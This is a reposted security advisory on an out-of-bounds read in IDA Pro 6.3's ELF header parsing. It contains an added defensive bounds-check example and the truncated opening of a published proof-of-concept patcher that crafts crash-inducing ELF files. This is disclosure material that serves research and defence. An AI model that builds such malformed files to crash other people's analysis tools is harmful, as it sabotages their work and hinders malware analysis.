IDA Pro 'ELF' File Remote Denial of Service Vulnerability

Release date: 2012-12-20
Updated: 2012-12-22

Affected systems:
Hex-Rays IDA Pro 6.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57004

IDA Pro, short for IDA (Interactive Disassembler), is an interactive disassembly tool.

The flaw lies in IDA Pro's handling of the ELF header of ELF files. The ELF header contains two fields, e_shnum and e_shstrndx: the former is the number of entries in the section header table, the latter is an index into that table. Before using e_shstrndx to reference an entry in the section header table, IDA Pro does not verify whether e_shstrndx is greater than e_shnum, which results in an out-of-bounds access. An attacker can craft a malicious ELF file whose e_shstrndx is greater than e_shnum and trick a victim into opening it. The vulnerability crashes the affected application and may allow code execution (unconfirmed).
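The missing bounds check described above, written out as an added example (not code from the advisory, from nitr0us, or from Hex-Rays); the ELF32 field offsets are standard, while the status codes and the constructed test header are assumptions of this example:

```c
#include <stdint.h>
#include <string.h>

/* Added example, not from the advisory: the bounds check on e_shstrndx that
 * the advisory says IDA Pro 6.3 lacked, applied to a raw ELF32 header. */
#define ELFCLASS32    1
#define ELFDATA2LSB   1
#define SHN_UNDEF     0
#define SHN_LORESERVE 0xff00
#define SHN_XINDEX    0xffff
#define EHDR32_SIZE   52   /* sizeof(Elf32_Ehdr) */

enum shstr_status {
    SHSTR_OK = 0,            /* e_shstrndx is a valid index into the table */
    SHSTR_NONE = 1,          /* no section name table (e_shstrndx == SHN_UNDEF) */
    SHSTR_EXTENDED = 2,      /* SHN_XINDEX: real index is in shdr[0].sh_link */
    SHSTR_BAD_HEADER = -1,   /* not an ELF32 little-endian file, or too short */
    SHSTR_OUT_OF_RANGE = -2  /* e_shstrndx >= e_shnum: the crash condition */
};

static const uint8_t elf_magic[4] = { 0x7f, 'E', 'L', 'F' };
static uint16_t rd16le(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Validate e_shstrndx against e_shnum before it is ever used as an index.
 * Field offsets in a 32-bit ELF header: e_shnum at 48, e_shstrndx at 50. */
enum shstr_status check_shstrndx(const uint8_t *buf, size_t len)
{
    if (len < EHDR32_SIZE || memcmp(buf, elf_magic, 4) != 0 ||
        buf[4] != ELFCLASS32 || buf[5] != ELFDATA2LSB)
        return SHSTR_BAD_HEADER;
    uint16_t e_shnum    = rd16le(buf + 48);
    uint16_t e_shstrndx = rd16le(buf + 50);
    if (e_shstrndx == SHN_UNDEF)
        return SHSTR_NONE;
    if (e_shstrndx == SHN_XINDEX)  /* >= 0xff00 sections: index lives in shdr[0] */
        return SHSTR_EXTENDED;
    if (e_shstrndx >= SHN_LORESERVE || e_shstrndx >= e_shnum)
        return SHSTR_OUT_OF_RANGE;
    return SHSTR_OK;
}

/* Constructed 52-byte ELF32 header for testing; only the fields the check reads are set. */
void make_test_ehdr(uint8_t out[EHDR32_SIZE], uint16_t e_shnum, uint16_t e_shstrndx)
{
    memset(out, 0, EHDR32_SIZE);
    memcpy(out, elf_magic, 4);
    out[4] = ELFCLASS32; out[5] = ELFDATA2LSB; out[6] = 1; /* EV_CURRENT */
    out[48] = (uint8_t)e_shnum;    out[49] = (uint8_t)(e_shnum >> 8);
    out[50] = (uint8_t)e_shstrndx; out[51] = (uint8_t)(e_shstrndx >> 8);
}
```

A loader that returns SHSTR_EXTENDED must then bounds-check shdr[0].sh_link the same way, since SHN_XINDEX only moves the index, not the problem.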

<*Source: Alejandro Hernández (nitrousenador@gmail.com)
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

/*
*
* IDA Pro 6.3 (crash due an internal error)
* ELF anti-debugging/reversing patcher
*
* Published @ IOActive Labs Research blog:
*
*
* - nitr0us [ ]
*
* Tested under:
* IDA Pro Starter License 6.3.120531 (Mac OS X)
* IDA Pro Demo            6.3.120730 (Ubuntu Linux 9.04)
* IDA Pro Demo            6.3.120730 (Mac OS X 10.7.3)
* IDA Pro Demo            6.3.120730 (Windows Vista Home Premium SP2)
*
* Bug found using Frixyon fuzzer (my ELF file format fuzzer still in development)
*
* Timeline:
* 21/11/2012    The bug was found on IDA Demo 6.3
* 22/11/2012    The bug was tested on IDA Pro Starter License 6.3.120531 (32-bit)
* 22/11/2012    The bug was reported through the official Hex-Rays contact emails
* 23/11/2012    Hex-Rays replied and agreed that the bug leads to an unrecoverable
*              state and it will be fixed on the next release
*
**************** TECHNICAL DETAILS ***********************
nitr0us@burial:~$ gdb -q idaq
(gdb) r a.out
(no debugging symbols found)

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to Thread 0xb6860760 (LWP 3638)]
0xb55f7694 in default_notification_handler (reader=@0xbfbffae0,
    notif=reader_t::err_shstrndx) at reader.cpp:33
33      reader.cpp: No such file or directory.
        in reader.cpp
Current language:  auto; currently c++
(gdb)

The root cause of the problem is that there's no validation to
verify if e_shstrndx > e_shnum before referencing it.

**********************************************************
*
* [Compilation] $ gcc ida_63_elf_shield.c -o ida_63_elf_shield -Wall
*
* Sh0utz: IOActive fellows, CRAc, b33rc0n crew (dex, hkm, calderpwn,
*        Carlos Ayala, Daemon [Thanks for test it on IDA paid $$$],
*        LightOS) chr1x, alt3kx, tr3w, crypkey, el_chito, nahual, beck,
*        sirdarkcat, NataS, ran, Fede Bossi, nediam, psymera, Rolman,
*        Kbrown, Bucio, p4dm3, Hector Lopez, zeus, Matias Brutti,
*        sunl3vy, Raaka_elgaupo, vendetta, raito, beavis, el5patas,
*        vi0let.
*
*
*
*
*
*/

#include <sys/mman.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <time.h>

#define EI_NIDENT      16
#define ELFCLASS32      1              /* 32-bit objects */
#define ELFDATA2LSB    1              /* 2's complement, little endian */

const char e_magic[4] = { 0x7f, 'E', 'L', 'F' };

typedef uint16_t Elf32_Half;
typedef uint32_t Elf32_Word;
typedef uint32_t Elf32_Addr;
typedef uint32_t Elf32_Off;

typedef struct
{
  unsigned char e_ident[EI_NIDENT];     /* Magic number and other info */
  Elf32_Half    e_type;                 /* Object file type */
  Elf32_Half    e_machine;              /* Architecture */
  Elf32_Word    e_version;              /* Object file version */
  Elf32_Addr    e_entry;                /* Entry point virtual address */
  Elf32_Off     e_phoff;                /* Program header table file offset */
  Elf32_Off     e_shoff;                /* Section header table file offset */
  Elf32_Word    e_flags;                /* Processor-specific flags */
  Elf32_Half    e_ehsize;               /* ELF header size in bytes */
  Elf32_Half    e_phentsize;            /* Program header table entry size */
  Elf32_Half    e_phnum;                /* Program header table entry count */
  Elf32_Half    e_shentsize;            /* Section header table entry size */
  Elf32_Half    e_shnum;                /* Section header table entry count */
  Elf32_Half    e_shstrndx;             /* Section header string table index */
} Elf32_Ehdr;

int isELF(int fd);

int main(int argc, char **argv)
{
  Elf32_Ehdr *header;       /* mapped ELF header of the target file */
  Elf32_Half  new_shnum;    /* value to write into e_shnum */
  Elf32_Half  new_shstrndx; /* value to write into e_shstrndx */
  int         fd;           /* descriptor of the file being patched */

Reproduced from: https://www.heiqu.com/wygjyg.html